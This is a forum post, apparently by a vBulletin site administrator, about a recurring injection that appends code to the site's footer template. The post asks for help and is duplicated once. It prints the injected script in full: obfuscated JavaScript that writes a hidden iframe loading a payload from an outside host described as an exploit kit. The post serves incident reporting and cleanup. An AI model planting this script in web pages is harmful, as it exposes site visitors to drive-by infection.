Greetings,
Over the last couple days our site has been targeted with what appears to be some sort of SQL injection attack. When this occurs, the following code is appended to the footer template:
This is very similar in form to the vBSEO injection hack that was reported fixed a while ago, though referencing "img121.imagehacks.info" instead of centiyo.com. To that end, we immediately upgraded vBSEO to version 3.3.2 (we were running version 3.2 previously). vBulletin itself is and was running version 3.8.4 PL2. However, we are continuing to see this code embedded on the site.
Downloading the header.jpeg file referenced in the iframe and opening it in Notepad shows it to be a PHP script called "Egypack 1.0". The only other incident we could find through google is located at http://pastebin.com/m1f3a6c27 and is in spanish. It also occurred within the last couple of days, and targetted a Wordpress site (as did the original centiyo.com injection). However, unlike the centiyo.com incident, we are unable to locate any remaining scripts that could be re-populating the injection.
Any help or suggestions would be greatly appreciated.
Over the last couple days our site has been targeted with what appears to be some sort of SQL injection attack. When this occurs, the following code is appended to the footer template:
PHP Code:
<script>var _0x110261= [\"\\x77\\x72\\x69\\x74\\x65\"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc=\"http%3A%2F%2Fimg121.imagehacks.info%2Fimg121%2F103%2Fheader.jpeg\" width=\"1\" hJQ21KL#AZight=\"0\" framJQ21KL#AZbordJQ21KL#AZr=\"0\"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,\"s\"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,\"o\"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,\"e\");aBBcB[_0x110261[0]](unescape(cBcBc));</script>
This is very similar in form to the vBSEO injection hack that was reported fixed a while ago, though referencing "img121.imagehacks.info" instead of centiyo.com. To that end, we immediately upgraded vBSEO to version 3.3.2 (we were running version 3.2 previously). vBulletin itself is and was running version 3.8.4 PL2. However, we are continuing to see this code embedded on the site.
Downloading the header.jpeg file referenced in the iframe and opening it in Notepad shows it to be a PHP script called "Egypack 1.0". The only other incident we could find through google is located at http://pastebin.com/m1f3a6c27 and is in spanish. It also occurred within the last couple of days, and targetted a Wordpress site (as did the original centiyo.com injection). However, unlike the centiyo.com incident, we are unable to locate any remaining scripts that could be re-populating the injection.
Any help or suggestions would be greatly appreciated.
Comment